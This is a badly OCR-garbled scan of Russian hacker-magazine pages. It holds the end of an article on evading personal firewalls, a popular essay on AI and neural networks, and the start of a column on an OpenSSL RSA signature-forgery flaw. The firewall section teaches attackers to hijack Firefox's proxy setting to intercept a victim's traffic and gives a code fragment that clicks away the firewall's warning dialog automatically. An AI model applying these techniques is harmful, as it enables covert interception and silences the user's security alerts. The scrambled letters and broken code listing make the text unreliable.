персональными брандмауэрами, а поэто- 
му справедлива не только для одного лишь 
ОіЛрозГа, но также и для других продуктов. 
Главный минус — это права администрато- 
ра. Статья ничего не говорит о том, как их 
заполучить. И хотя под администратором 
сидит свыше половины домашних пользо- 
вателей ХР, да и в самой операционной сис- 
теме имеется множество дыр, позволяющих 
хакеру несанкционированно повышать уро- 
вень своих привилегий вплоть до 8У8ТЕМ, 
представляет интерес обойти брандмауэр, 
располагая всего лишь правами простого 
пользователя. 

Начнем с того, что большинство брандмауэ- 
ров не отслеживаютлокальные подключения 
по петле 127.х.х.х, поскольку такие пакеты 
идут совсем по-другому маршруту. Поэтому 



> Изменение настроек РігеРох в обход брандмауэра 
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>ТОІМоп покажет трафик, проходящий через ТОІ-драйвер — 
один из наиболее низкоуровневых сетевых драйверов 



если на компьютере установлен каком-ни- 
будь сервер, хакер может напрямую подклю- 
чаться к нему. Брандмауэр и знать ничего не 
будет. Если, конечно, сам сервер включает 
127.х.х.х в список доступных интерфейсов. 
А если не включает?! Хорошо, тогда пере- 
даем атакующую программу на соседнюю 
локальную машину (локальный трафик, как 
правило, не запрещается брандмауэром, 
во всяком случае, пересылка файлов все- 
таки возможна). Ну а дальше атакующей 
программе остается всего лишь связаться 
с сервером по разрешенному интерфейсу 
локальной сети, если, конечно, локальная 
сеть вообще есть. 

Очень многие ставят персональный бранд- 
мауэр на одиночный компьютер только за- 
тем, чтобы следить за активностью приложе- 
ний, ломящихся в сеть. И если вдруг наша 



хакерская програм- 
ма (не являющаяся 
ни ІЕ, ни РігеРох'ом) 
вдруг постучится в 
80-й порт, то бранд- 
мауэр тут же подни- 
меттревогу. Как, мол, 
это так! Многие хаке- 
ры пытаются внед- 
риться в адресное 
пространство дове- 
ренных приложений 
(того же РігеРох, 
например) посредс- 
СгеаІеРетогеТИгеасІО/ 
но брандмауэры за 



твом АРІ-функций 
ѴѴіѣеРгосеззМетогуО 
этим зорко следят. Модификация файла на 
диске также не дает ожидаемых результа- 
тов, поскольку брандмауэр проверяет конт- 
рольную сумму при его запуске. Правда, тут 
есть одна небольшая лазейка. Известная 
ветка реестра АррІпіЦЭІ_І_з: все ОІ_І_, пере- 
численные в ней, проецируются на адрес- 
ные пространства каждого запускаемого 
процесса со всеми вытекающими отсюда 
последствиями. Однако все больше и боль- 
ше брандмауэров начинает контролировать 
АррІпіІ_0І_І_з, сообщая о появлении в ней 
новых элементов, а то и вовсе автоматичес- 
ки удаляет их, так что этот прием уже давно 
устарел. 

Авотчто по-прежнему остается актуальным, 
так это изменение настроек браузера, ко- 



торые хранятся в совершенно бесхозном и 
никем не сохраняемом виде. Взять хотя бы 
РігеРох. АдресРгоху-серверахранитсявфай- 
ле Юоситеп^з апб 5еиіпдз\кгіз казрегзку\ 
АррІіса1іоп\ ОаІа\Мо2ІІІа\Ріге1 : ох\РгоІіІез\ 
4из2\А/ііе.сІеІаиІі\ргеіз.із, в строке «изег_ 
ргеі(«пеІ\А/огк.ргоху.Иир», «80.75.2.146»);», 
которую никакой брандмауэр не проверя- 
ет. Если подставить сюда адрес нашего 
узла (естественно, для этого необходимо 
иметь статический ІР, либо динамический 
ІР, повешенный на динамический ОІ\ІЗ), то 
мы сможем грабить весь трафик или даже 
подсовывать жертвелевый контент, абран- 
дмауэр даже и не пикнет! 

Кстати говоря, тот же РігеРох большей ча- 
стью написан на ^ѵа, целостность которой 
брандмауэры контролировать еще не нау- 
чились, ограничиваясь проверкой кодовой 
секции, а это значит, что мы можем модифи- 
цировать РігеРох по своему усмотрению, не 
рискуя, что брандмауэр застанет нас врас- 
плох. Ну, а если все-таки застанет и выкинет 
вот такое противное окно, как показано на 
рисунке? Что мы будем делать тогда?! 

А вот тогда мы используем старый, как дуб, но 
все еще работающий трюк с эмуляцией клави- 
атурного/мышиного ввода. Попросту говоря, 
отследим появление окна брандмауэра с над- 
писью «ЗуОаіе РегзопаІ РігеѵѵаІІ» (что можно 
сделать с помощью АРІ-функции РіпсІѴѴіпсІоѵѵ), 
перечисляем дочерние элементы управления 
через ЕпитѴѴіпсІоѵѵз и жмем на кнопку «уез» . 




Настоящий ТВ-тюнинг! 

Ѵ-* V. 1 Ь Г. К І.'* I Н П г. т и =, 

УНИКАЛЬНЫЕ ЖЕЛЕЗО И СОФТ: 

+ Безупречные картинке и звук 
Запись без рекламы 
+ Объемное изображение 
+ Вице о наблюдение 

ШИРОКИЙ ВЫБОР УДОВЛЕТВОРИТ ВСЕХ 
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> Типичная реакция персонального брандмауэра на неудачную атаку 



Естественно, каждый брандмауэр требует 
своего подхода, но поскольку их существует 
не так уж и много, нам будет легко написать 
программу, поддерживающую их все. Клю- 
чевой фрагмент, ответственный за нажатие 
выглядиттак: 

Перечисление дочерних окон брандмауэра 

// получаем хэндлы всех интересующих нас окон 
Н\ЛЮЫ САЫВАСК ЕпитСНІІсІѴѴІпсІоѵѵзРгос 
(НѴѴІ\Ю ЬѵѵпсІ, І_РАНАМ ІРагат) 



по = ІгѵѵпсІ; 

Ьгеак; 

сазе 5: //кнопка "сіеіаіі" 

сіеіаіі = ЬѵѵпсІ; 

Ьгеак; 

сазе 6: // кнопка "уез" 

уез = ЬѵѵпсІ; 
геіигп уез; 

цЯ 

геіигп 0; 



зіаііс N=0; 
зѵѵіісЬ(++І\І) { 

сазеЗ: // галочка "гететЬег" 

гететЬег = ЬѵѵпсІ; 

Ьгеак; 

сазе 4: //кнопка "по" 



//имитация нажатия на кнопку уез 
іоо(НѴѴІ\Ю ЬѴѴпсІ) 

{ 

ЗепсІМеззаде(Ь\/ѴпсІ, ѴѴМ_ЗЕТЕОСІІЗ, 1 , 0); 
ЗепЬМеззаде(ЬѴѴпсІ, ВМ_ЗЕТЗТАТЕ, 1 , 0); 
РозіМеззаде(ЬѴѴпсІ, \Л/М_КІІ_І_ЕОСІІЗ, 0, 0); 



> НТТР Рюху Зегѵег принимает подклю- 
чения только с одного интерфейса — ин- 
терфейса локальной сети 




Некоторые пояснения к листингу. Первое 
и главное. Менее привилегированное при- 
ложение может посылать сообщения окну 
более привилегированного приложения, 
причем последнему будет очень сложно 
определить, кто именно нажал на кнопку: 
пользователь или программа. Однако про- 
граммно нажать на кнопку не так-то легко! 
Но ведь нам же хочется, чтобы атака оста- 
лась незамеченной, и брандмауэр молчал, 
как партизан, после расстрела (именно 
после, а не перед, поскольку после нажа- 
тия на «уез» брандмауэру будет совершен- 
но не о чем волноваться). 

Большая ошибка начинающих хакеров со- 
стоит в том, что они ограничиваются всего 
лишь одной посылкой сообщения ВМ_ 
ЗЕТ5ТАТЕ, а, как показывает практика, для 
элемента управления типа «кнопка» этого 
явно не достаточно, и такое сообщение еще 
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не приводит к ее нажатию. Почему? Ошиб- 
какроется втом, что для корректной эмуля- 
ции ввода мы, во-первых, должны устано- 
вить фокус (сообщение ѴѴМ_ЗЕТРОСІ)3), 
а после перевода кнопки в состояние 
«нажато» (сообщение ВМ_ЗЕТЗТАТЕ) этот 
фокус убить (сообщен ие \Л/М_КІІ_І_БОСІІЗ), 
ведь, как известно даже желторотым поль- 
зователям, кнопки срабатывают не в мо- 
мент их нажатия, а в момент отпускания. 
Не веришь? Поэкспериментируй с любым 
приложением и убедись в справедливости 
сказанного. 

Еще одна деталь напоследок. Если в роли 
убийцы фокуса выступает функция АРІ- 
ЗепсІМеззаде, то поток, эмулирующий ввод, 
блокируется вплоть до того момента, пока 
обработчик нажатия кнопки не возвратит 
циклу выборки сообщений своего управ- 
ления. Чтобы этого не произошло, нужно 
использовать АРІ-функцию РозіМеззаде, 
которая посылаетубийцуфокусаи, не дожи- 
даясь от него ответа, как ни в чем не бывало 
продолжает выполнение. 

Однако разработчики брандмауэров тоже не 
байтом деланы и всячески сопротивляются 
эмуляции ввода. Они могут вообще не обра- 
батывать указанных сообщений, реагируя, 
например, на ѴѴМ_КЕѴООѴѴІ\І или что-то еще. 
Коварство ѴѴіпсІоѵѵз заключается в том, что 
она позволяет нажать кнопку очень многими 
путями. Но ведь не ковыряться же с каждым 
отдельно взятым брандмауэром?! 
Существует весьма простой и элегантный 
путь выхода из этой, казалось бы, безна- 
дежной ситуации. Перемещаем мышиный 
курсор к нужной кнопке АРІ-функцией 
МоизеМоѵе (координаты кнопки опреде- 
ляются, как и прежде, через перечисление 
элементов управления), после чего вызы- 
ваем АРІ-функцию ЗепсІІприі, имитирую- 
щую клавиатурный ввод на очень низком 
уровне. И все — брандмауэр отдыхает. 

О Заключение 

Разумеется, мы рассмотрели далеко не 
все возможные способы борьбы с персо- 
нальными и внешними брандмауэрами. Но 
хакерская мысль не стоит на месте! Новые 
идеи рождаются буквально каждый день. 
Глупо верить, что всякие там Оиірозі’ы, 
2опеА1апп’ы, Зудаіе РегзопаІ РігеѵѵаІІ яв- 
ляются панацеей и спасут тебя от любой 
заразы. Опытные хакеры и программисты 
троянов все равно знают, как любой из них 
обойти, но при этом пренебрегать их ис- 
пользованием не стоит. ПЕ 
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БРАТЬЯ ПО РАЗУМУ 

ИСКУССТВЕННЫЙ ИНТЕЛЛЕКТ И ВСЕ, ЧТО С НИМ СВЯЗАНО 

ЧЕЛОВЕЧЕСКИЙ МОЗГ КАЧЕСТВЕННО ОТЛИЧАЕТСЯ ОТ МОЗГОВ ДРУГИХ ЖИВОТНЫХ. КОШКИ, ПТИЦЫ И МЕДВЕДИ В ПРИ- 
НЯТИИ РЕШЕНИЙ РУКОВОДСТВУЮТСЯ СВОИМИ ИНСТИНКТАМИ, КОТОРЫЕ ЗАЛОЖЕНЫ В НИХ ОТ ПРИРОДЫ: ПОЖРАТЬ, 
УБЕЖАТЬ ОТ ОПАСНОСТИ, РАЗМНОЖИТСЯ. ЧЕЛОВЕКУ ЭТО ТОЖЕ СВОЙСТВЕННО, НО В МЕНЬШЕЙ СТЕПЕНИ. У НЕГО ЕСТЬ 
ИНТЕЛЛЕКТ, КОТОРЫЙ ПОЗВОЛЯЕТ ЕМУ НАКАПЛИВАТЬ ЗНАНИЯ, СТРУКТУРИРОВАТЬ ИХ И ПРИНИМАТЬ РЕШЕНИЯ НА ИХ 
ОСНОВЕ. ИМЕННО ЭТО КАЧЕСТВО ПОЗВОЛИЛО ЧЕЛОВЕКУ СДЕЛАТЬ ТАКОЙ БОЛЬШОЙ ШАГ ВПЕРЕД. 

СОВРЕМЕННЫЙ ЧЕЛОВЕК НАСТОЛЬКО РАЗВИТ, ЧТО УЖЕ НЕ ПЕРВУЮ СОТНЮ ЛЕТ ТОЛЬКО И ДУМАЕТ НАД ТЕМ, КАК СМО- 
ДЕЛИРОВАТЬ ПРОЦЕСС СОБСТВЕННОГО МЫШЛЕНИЯ. 




ожѳтли машина мыслить? Даже 
если может, то будет ли этот про- 
цесс похож на мышление челове- 
ка? Эти вопросы остаются без ответа и по 
сей день. И если ты думаешь, что ответ на 
эти вопросы — всего лишь дело времени и 
развития технологий, то ошибаешься. Фи- 
гурирующий в компьютерных играх ИИ — 
не что иное, как простой алгоритм, дергаю- 
щий фигурки за веревочки, как в тире. 

ИИ, показанный в фильме Спилберга 
«АгШісіаІ ІпІеІІідепсе», может более-менее 
точно отобразить то, что люди хотят от ИИ и 
что собираются делать: обычных алгорит- 
мизированных марионеток. Однако это ни 
в коем случае не интеллект и не братья по 
разуму. 



О Рейх ех тасЫпа 

Представлял ли ты когда-нибудь компью- 
тер изнутри? Ну, не в смысле набора мик- 
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росхем, потоков электронов и намагни- 
ченных участков винчестера, а как целый 
организм, в котором, если присмотреться и 
прислушаться, бродит какой-то электрон- 
ный «дух», живущий в этом наборе плат и 
периферийных устройств, и именно благо- 
даря нему комп может нормально функци- 
онировать. Я не говорю о какой-либо мис- 
тике, просто есть разница в ощущениях, 
когда ты включаешь утюг и компьютер. То 
— железяка, а это — вроде что-то сообра- 
жает. В общем, ты и так прекрасно знаешь, 
благодаря чему и даже как он соображает. 
Нотолько чувство того, что компьютер — не 
просто железяка, поможет нам в дальней- 
шем, когда мы будем говорить о машинах 
Тьюринга. 

Одна из проблем ИИ — добиться уверен- 
ности в том, что это именно интеллект, а не 
что-то другое. Допустим, кому-то из наших 
народных умельцев или какой-то группе 



ярых ученых удалось сделать ИИ, и они об 
этом во всеуслышание объявляют: дескать, 
приходите, смотрите. Как ты тут опреде- 
лишь, что все по-честному?Самый простой 
тест для проверки предложил в 1950 году 
Алан Тьюринг, один из отцов кибернетики. 
Тест Тьюринга состоит в том, что в разных 
комнатах находятся люди и машина. Они 
не могут видеть друг друга, но имеют воз- 
можность задавать друг другу вопросы в 
безличной форме — например, с помощью 
электронной почты или аськи. Если в про- 
цессе диалога между участниками игры лю- 
дям неудаетсяустановить, что один изучас- 
тников — машина, то такую машину можно 
считать обладающей интеллектом. Ну, раз- 
ве не правда, что если на вопросы машина 
отвечает так же, как если бы отвечал обыч- 
ный человек, значит, и механизмы форми- 
рования ответа схожи с человеческими. Да 
и как может быть тогда по-другому? 
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> Современный перцептрон использует лазерное сканирование 



Тебе не кажется, что слишком все как-то 
просто? В нашем примере, если у новоис- 
печенного ИИ получится отвечать налюбые 
поставленные ему вопросы как обычный че- 
ловек, то можно считать, что этот компьютер 
или прога обладает интеллектом, равным 
человеческому. 

Теперь представь себе другую, уже совсем 
фантасмагорическую ситуацию. Допустим, 
вХІХвекевсеученыеЗемлизадумал поделать 



Представь теперь, что ей задают ряд воп- 
росов типа: «Знаешь, вчера я плавал вмес- 
те с акулой в воздушном шаре вблизи лун- 
ного Моря Спокойствия, ты там бывал?». 
И машина отвечает: «Это неправда, в воз- 
душном шаре нельзя плавать на Луне» или 
что-то в этом духе, разоблачая таким обра- 
зом спрашивающего. И вот тут непонятно, 
действительно ли понимает этот механизм 
всю описанную ситуацию, или благодаря 



простых алгоритмов. Если это возможно, то, 
скорее всего, можно сделать компьютер, 
аналогичный по интеллекту человеку. 

Здесь мы подошли к одному из самых важ- 
ных вопросов ИИ: в таком случае, где у ме- 
ханической машины-гиганта сознание и 
есть ли оно у нее, хотя она и проходит тест 
Тьюринга? 

Грубо говоря, мы тоже сложные белковые 
машины, в которых большинство процессов 



Попробуем представить, как мог бы выглядеть будущий квантовый компьютер. Вероятно, большой 
компьютер будет содержать тысячи управляющих элементов, действующих локально на каждую 
ячейку квантовой памяти — квантовый кубит. Каким образом могло бы осуществляться это воз- 
действие? Скорее всего, с помощью электрических импульсов, подаваемых на микроэлектро- 
ды, подведенные к кубитам. Возможно также оптическое управление пучками света, сфокусиро- 
ванными на кубитах. 



механический мозг, который может пройти 
тест Тьюринга (ну, они, конечно, Тьюринга 
тогда не знали, но что нам мешает пофанта- 
зировать?). Конструктивно делают они его 
не сложнее обычной печатной машинки, ко- 
торая одну комбинацию отбитых на ней сим- 
волов заменяет по сложнейшему алгорит- 
му на другую. Пусть размеры этой машины 
даже займут целую планету, и ее словарный 
запас вмещает все известные человечест- 
ву на то время слова, а программирование 
алгоритмов настолько сложно, что может за- 
нять не одну сотню лет. Однако представим, 
что результат налицо — механическая гро- 
мада успешно проходит тест Тьюринга. 



сложнейшему алгоритму дал именно такой 
ответ. Если представить человека и машину 
черными ящиками, не заботясь о том, что у 
них находится внутри и как формируются 
правильные и приемлемые ответы, то можно 
сказать точно: эти системы эквивалентны в 
том, что мы понимаем под интеллектом. 

И пусть мы из белка, а машина — даже не 
из электроники, а из шестеренок, передач 
и редукторов, но все равно результат один. 
Такое прохождение теста Тьюринга с помо- 
щьюалгоритмическихмашин можно назвать 
формальным решением проблемы ИИ. Но 
сложно сказать, формально ли наше мыш- 
ление, то есть можно ли его свести к набору 



связано с механикой биохимии организма. 
Но мы сознательно чувствуем, что в нас си- 
дитдумающая, чувствующая, что-то понима- 
ющая личность, которая в любом состоянии 
может пройти тест Тьюринга. Есть ли та- 
кое же чувство у машины, сконструирован- 
ной для прохождения теста? Неважно, меха- 
ническая она, электронная или квантовая. 
Есть лив ней личность, или это только набор 
алгоритмов? А может, этот набор алгорит- 
мов и есть личность? 

На эти вопросы до сих пор нет ответа, и 
если мы когда-нибудь встретим братьев по 
разуму, то одна из загадок будет состоять в 
том, какобъяснить именно их мыслительный 
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> Вот так выглядит современный квантовый компьютер 



процесс и интеллектуальную деятельность, 
потому как примерить на себя для проверки 
сознание и личность той же машины или ал и- 
ена нам возможности не представится. 

О Нейросети в железе и органике 

Проще всего начать конструировать ИИ по 
знакомому принципу: повторяя в железе и 
моделировании уже известный, нормально 
работающий интеллект — мозг человека. 
С середины прошлого века было известно 
в деталях структурное устройство мозга. 
Нервные клетки, соединенные между собой, 
формируют огромную нейронную сеть (НС), 
в которой и проходят, как считается на сегод- 
няшний день, мыслительные процессы. 

Что самое интересное, исследование нейро- 
сетей носитприкладнуюпользу. Наибольшее 
количество применений «урезанного» ИИ 



рвными клетками головного мозга, которые 
могут быть возбуждены или заторможены. 
Он обладает группой синапсов — однона- 
правленных входных связей, соединенных 
с выходами других нейронов, а также имеет 
аксон — выходную связь данного нейрона, 
с которой сигнал (возбуждения или тормо- 
жения) поступает на синапсы следующих 
нейронов. Общий вид нейрона приведен на 
рисунке. 

Каждый синапсхарактеризуется величиной 
синаптической связи, которая по физичес- 
кому смыслу эквивалентна электрической 
проводимости. 

Одна из фишек нейросетей и нашего с тобой 
мозга — принцип параллельной обработки 
сигналов, который достигается путем объ- 
единения большого числа нейронов в слои и 
соединения определенным образом нейро- 



задачи, подвластные ей. Очевидно, что про- 
цесс функционирования нейросетей, то есть 
сущность действий, которые она способна 
выполнять, зависит от величин синаптичес- 
ких связей, поэтому, задавшись определен- 
ной структурой НС, отвечающей какой-либо 
задаче, разработчик сети должен найти оп- 
тимальные значения всех переменных ве- 
совых коэффициентов (некоторые синапти- 
ческие связи могут быть постоянными). 

Этот этап называется обучением нейросети, 
и от того, насколько качественно он будет 
выполнен, зависитспособность сети решать 
поставленные перед ней проблемы во время 
моделирования. На этапе обучения, кроме 
подбора весов, важную роль играет время 
обучения. Как правило, эти два параметра 
связаны обратной зависимостью, и их при- 
ходится выбирать на основе компромисса. 



Что касается электрических методов, то они уже давно и широко применяются в микроэлектро- 
нике для управления классическими логическими элементами. Поэтому их использование пред- 
ставляется наиболее перспективным и для создания масштабируемых квантовых компьютеров. 
Возможно, конечно, что в результате какого-нибудь технологического прорыва появится еще 
и третий вариант. 



основано именно нанейросетях. С помощью 
НС можно, например, предсказывать пока- 
затели биржевого рынка, выполнять распоз- 
навание оптических или звуковых сигналов, 
создавать самообучающиеся системы, спо- 
собные управлять автомашиной при парков- 
ке или синтезировать речь по тексту. 

Основу любой нейросети составляют одно- 
типные элементы (ячейки), имитирующие 
работу отдельных нейронов мозга. Каждый 
искусственный нейрон характеризуется 
своим текущим состоянием по аналогии с не- 



нов различных слоев. Поэтому нейросети так 
привлекательны для моделирования различ- 
ных сложных и разветвленных процессов, 
одним из которых является наше с тобой 
мышление. 

Теоретически, число слоев и число ней- 
ронов в каждом слое может быть любым, 
лишь быхваталомощностиукомпьютера, на 
котором нейросеть моделируется, или спе- 
циализированной микросхемы, на которых 
НС реализуется «в железе». Чем сложнее и 
разветвленнее нейросеть, тем масштабнее 



Обучение НС может вестись с учителем или 
без него. В первом случае сети предъявля- 
ются значения как входных, так и желатель- 
ныхвыходныхсигналов,ионапо некоторому 
внутреннему алгоритму подстраивает веса 
своих синаптических связей. Во втором 
случае выходы НС формируются самосто- 
ятельно, а веса изменяются по алгоритму, 
учитывающему только входные и производ- 
ные от них сигналы. Так реализовано само- 
обучение в нейронных сетях. 

Однако для того, чтобы смоделировать ра- 



/ 050 




ХАКЕР 10 /94/ 06 










^ ітріап^ 




боту мозга, недостаточно одной нейросети. 
Необходимо снабдить ее входными данны- 
ми, то есть чувствами. 

В 1957 году американский физиолог Ф.Ро- 
зенблатт предложил модель зрительного 
восприятия и распознавания, которая мог- 
ла бы служить периферией нейросетей. 
Ощущающую модель назвали перцептро- 
ном. В те годы это было необычно — чувс- 
твующая машина, способная обучаться 
понятиям и распознавать предъявляемые 
объекты. Она чрезвычайно заинтересовала 
не только физиологов, но и представителей 
другихобластей знаний и породилабольшой 
поток теоретических и экспериментальных 



исследований. 

Перцептрон или любая про- 
грамма, имитирующая процесс 
распознавания, работает в двух 
режимах: в режиме обучения и 
в режиме распознавания. В ре- 
жиме обучения некто (человек, 
машина, робот или природа), иг- 
рающий роль учителя, предъяв- 
ляетмашине объекты и о каждом 
их них сообщает, к какому понятию (классу) 
он принадлежит. 

По этим данным строится решающее прави- 
ло, являющееся по существу формальным 
описанием понятий. В режиме распознава- 
ния машине предъявляются новые объекты 
(вообще говоря, отличные от ранее предъяв- 
ленных), и она должна их классифицировать 
по возможности правильно. 
Классификацию обычно берут на себя ней- 
росети, вто время каксовременным перцеп- 
тронам остается только распознавать. Но 
и нейросети необходимо сначала научить 
распознавать входящие с перцептрона сим- 
волы. Например, проблема распознавания 



текста на сегодняшний день решена только 
механически, то есть набор символов попа- 
дает в нейросеть или компьютер, но их же 
еще нужно обработать как связный текст! 
К тому же ИИ должен понять его смысл, 
что существенно затрудняет процесс рас- 
познания. Ведь для того, чтобы «понять» 
текст из области химии, перцептрон дол- 
жен содержать базовые данные по химии 
и т. п. А в разговорной речи мы используем 
столько неклассифицированных понятий, 
что программы, способные анализировать 
разговорную речь, создать очень трудно. 
Но работы над ними ведутся давно, и уже 
есть ощутимые результаты (например, ИИ 
Ватопа, созданная Рэем Курцвейлом). 

В последнее время также ведутся работы 
по созданию органических нейросетей, в 
которых используются реальные нейроны 
крыс. Но, правда, говорить о сознании или 
интеллекте еще рано, так как нейроны ведут 
себя как обычные транзисторы: пропускают 
сигналы и производят элементарные логи- 
ческие операции. 








> Трехмерная нейронная сеть — увы, пока модель 



□ Кванты или электроны? 

То, какмозгустроен, известно уже довольно 
хорошо, но как все его составляющие части 
производят сам «мыслительный процесс», 
до сих пор неизвестно. 

Одна из модных теорий современности объ- 
ясняет работу памяти и мыслительных про- 
цессов с точки зрения переноса специальных 
химических веществ — нейромедиаторов. 
Это физиологически активные вещества, вы- 
рабатываемые нейронами. С помощью нейро- 
медиаторов нервные импульсы передаются от 
одного нервного волокнадругому волокну или 
другим клеткам через пространство, разде- 
ляющее мембраны контактирующих клеток. 
Это пространство, называемое синаптиче- 
ской щелью, является составной частью си- 
напса. 

Некоторые нейромедиаторы могутзатормо- 
зить активность нервного волокна. А после 
проявления своего действия медиаторы 
обычно разрушаются специфическими 
ферментами. 

Известно около тридцати различных нейро- 
медиаторов. Наиболее важные медиаторы 
центральной нервной системы — серото- 
нин, дофамин, норадреналин, ацетилхолин 
и гамма-аминомасляная кислота. 

Конечно, трудно поверить вто, что весьтвой 
внутренний мир можно запихнуть, образно 
говоря, в аптекарский пузырек, но, тем не 
менее, так считает современная наука. 



Однако не все ученые разделяют «химичес- 
кую» теорию. И отчасти не согласны с ней, 
как ни странно, физики, занимающиеся 
квантовой механикой. 

Они считают, что каждая макроскопическая 
система (ты, я, даже бутылка пива) харак- 
теризуется определенным квантовым со- 
стоянием, которое уникально для каждой 
наименьшей единицы времени. Более того, 
сложные квантовые системы, типа кванто- 
вых компьютеров, потенциально обладают 
вычислительной мощностью, во много раз 
превосходящей мощность современных 
компьютеров (по некоторым оценкам, в 
миллионы и даже миллиарды раз) из-за 
«встроенного» в квантовые системы рас- 
параллеливания процессов. 

Получается, если человеческий мозг спо- 
собен превосходить обычный компьютер 
в эффективности решения задач опреде- 
ленных классов, то, по всей видимости, это 
возможно лишь в силу того, что он обладает 
более мощными вычислительными ресур- 
сами, то есть большим быстродействием и 
большим объемом доступной памяти — как 
тут не проводить аналогию с квантовыми 
компьютерами. 

И, говоря по секрету, человеческий мозг 
целиком — это нечто большее, чем про- 
стые соединения нейронов и аксонов. 
Это квантовая система, состояние суммы 
отдельных частей которой будет меньше, 




> Древовидная нейросеть 



чем состояние мозга целиком. Этот эф- 
фект называется феноменом «квантового 
перепутывания». И, какутверждаютизвес- 
тные ученые-физики (Р. Пенроуз, П. Шор и 
другие), благодаря этому можно «научно 
поймать душу», то есть с точки зрения фи- 
зики, кроме электронов и протонов, мозг 
составляет «квантовую душу своих состо- 
яний», которая и отвечает за восприятие 
самого себя и окружающего мира. 

Ты, конечно, можешь без труда догадаться, 
что еслитактемно и запутанно обстоят дела 
в области человеческого сознания с точ- 
ки зрения классических теорий, то, может 
быть, будет легче и проще создать ИИ наос- 
нове квантовых компьютеров? 



Для того чтобы снизить уровень шумов, критически важный для нормальной работы квантового 
компьютера, первые модели, по всей видимости, придется охлаждать жидким гелием. Вероятно, 
первые квантовые компьютеры будут громоздкими и дорогими устройствами, не умещающи- 
мися на письменном столе и обслуживаемыми большим штатом системных программистов и 
наладчиков оборудования в белых халатах. Доступ к ним получат сначала лишь государственные 
структуры, затем богатые коммерческие организации. Но примерно так же начиналась и эра 
обычных компьютеров. 
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> Трехмерная нейронная сеть: исполнение в железе 












Скореевсего.первыесистемыспараллельной 
обработкой процессов будут созданы именно 
на основе квантовых компьютеров, так что и 
появление первого «настоящего» ИИ можно 
ожидать с развитием квантовой техники. 

О Инопланетный гость 

И напоследок вернемся к нашим алиенам. 
Ведь интересно, как они могут мыслить? 

Во всех обсуждениях подобного плана нуж- 
но опираться на твердую почву известных 
фактов. Мы знаем, из чего и как (ну, пусть 
нетакточно, какхотелось) состоит Вселен- 
ная. Знаем, что, скорее всего, жизнь нахо- 
дится на планетах или других космичес- 
ких образованиях (некоторые фантасты 
наделяли разумом целые планеты и даже 
звезды). 

Также нам доподлинно известно (правда, 
до определенных размерных пределов), из 
чего состоит материя. 

Еще мы знаем из основ эволюционной тео- 
рии, как развивался человек и как происхо- 
дило развитие мышления. 

Здесь можно воспользоваться хитрым мето- 
дом, предложенным многими психофизио- 
логами и физиками: смоделировать даль- 
нейшее развитие человека и проследить, 
как именно будет меняться его мыслитель- 
ная деятельность. Ведь если подумать, что 
многие галактические цивилизации живут в 
космосе дольше нас и опередили по «моз- 
гам» людей, то с помощью такого метода 
мы сможем иметь представление о разуме 
«развитом». 

Принято считать, что речь появилась око- 
ло 200 тысяч лет назад. Порядка 40 тысяч 



лет назад возникло мышление, как мы его 
понимаем сегодня. Затем на фоне многих 
бессознательных процессов возникло 
сознание. Эволюционно мы находимся на 
самом раннем этапе развития сознания, 
поэтому для движения вперед у нас нет 
никаких ограничений. 

Развитие сознания может привести к сле- 
дующему этапу развития психики, а именно 
— к развитию интуиции, которая будет оп- 
ределяться очень интенсивными неосозна- 
ваемыми мысленными процессами, то есть 
более высокой формой мышления. Человек 
будущего будет более точно прогнозировать 
и предопределять события, нежели человек 
сегодняшний. И все это благодаря нашему 
квантовому компьютеру, помещающемуся в 
черепной коробке. 

Далее можно высказать предположение, 
что на этапе еще более высокоразвитого 
уровня может появиться психофизиоло- 
гическая деятельность — способность 
человека изменять внешнюю среду не при 
помощи физического воздействия, а при 
помощи психическихпроцессов. Какэто бу- 
дет реализовано физически — еще тот пазл, 
но если принять струнную теорию строения 
мира, то любой мыслительный процесс в на- 
шем мозгу — сложнейшее состояние этих 
самых струн. А что мешает одной конфи- 
гурации струн воздействовать на другую? 
Тем более что по теории весь мир состоит 
из струн? 

Так вот, возвращаясь к нашим алиенам, дос- 
таточно цивилизации быть старше земной 
буквально на 15-20 тысяч лет, это может 
привести к непониманию этой цивилиза- 



ции землянами. Но самое интересное, если 
не брать за образец нашу цивилизацию, то 
инопланетяне, устроенные иначе, чем мы, 
могут быть вообще лишены какого-либо 
сознания в нашем понимании. Вот как ви- 
русы или муравьи — для нас и те, и другие 
— скорее «заводные машинки», чем думаю- 
щие создания. И понять алиена нам будет 
гораздо сложнее, чем муравья или жука, не 
говоря уже о понимании того, как они мыс- 
лят и мыслят ли вообще. 

Поэтому мы, можетбыть, в далеком будущем 
не сможем отличить мыслящих созданий 
от природных явлений или естественных 
образований планет. Лучшим примером по- 
добного непонимания будет океан Солярис 
Станислава Лема. 

О А оно нам надо? 

Как бы много мы ни сетовали о том, что на се- 
годняшний день искусственного интеллекта 
нет, я думаю, больше было бы волнений по 
поводу того, что он вдруг появился. С мили- 
таристической человеческой психикой нам 
соседи пока что ник чему. 

Вот усилитель «мозгов» нам нужен. Зачем 
отдавать развитие науки и технологий ИИ, 
когда можно будет сделать умнее и сооб- 
разительнее самое себя? И сделать это с 
помощью тех же бездушных имплантатов и 
компьютеров. 

Вот тебе и братья по разуму: искусствен- 
ные не дотягивают, а если и дотянут, то 
нам же хуже будет, а алиены в наши одеж- 
ки не влезают. Выходит, что человек обре- 
чен на интеллектуальное одиночество во 
Вселенной. ПЕ 
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> Место РКСЗ в общей иерархии 

криптосистемы □ ІСО под угрозой О Множественные уязвимости 

в горящем лисе 



О ОрепЗЗІ.: подделка 
цифровой подписи П$А 

ВгіеІ 

В самом конце августа 2006 года ЭапіеІ 
ВІеісИепЬасИег выступил с докладом на кон- 
ференции криптоаналитиков, где показал, 
что при стечении определенных обстоя- 
тельств цифровая подпись ЯЗА может быть 
подделана в прямом смысле слова — одной 
бумагой и карандашом. Виною тому не сам 
алгоритм ВЗА, аошибки его реализации. Од- 
ной из таких реализаций оказался знамени- 
тый проект Ореп88І_, которой вплоть до вер- 
сии 0.9.8с использовал ЯЗА-ключи с 
экспонентой 3, удаляющие расісііпд-поля 
РКСЗ #1 до генерации хэш-суммы, которая 
позволяла удаленному атакующему подде- 
лать РКСЗ #1 сигнатуру, подписанную ЯЗА- 
ключом и препятствующую корректной про- 
верке различных цифровых сертификатов, 
использующих РКСЗ. РКСЗ расшифровыва- 
ется как РиЫіс-Кеу СгуріодгарНу Зіапсіагсіз 
(криптографические стандарты на публич- 
ный ключ) и подробно описан в ЯРС-3447 
Шр://І1р.гІс-есІі1ог.огд/іп-по1ез/гІс3447.1хО . тех- 
нические детали атаки (со всеми математи- 
